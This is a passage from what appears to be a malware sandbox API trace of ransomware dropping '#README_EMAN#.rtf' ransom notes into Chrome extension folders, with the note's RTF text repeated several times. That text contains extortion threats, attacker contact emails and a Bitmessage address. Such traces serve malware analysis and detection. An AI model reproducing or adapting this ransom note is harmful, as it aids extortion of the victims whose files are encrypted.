:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.253] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.254] CloseHandle (hObject=0x294) returned 1 [0285.254] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\#readme_eman#.rtf")) returned 0xffffffff [0285.254] GetLastError () returned 0x2 [0285.254] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact 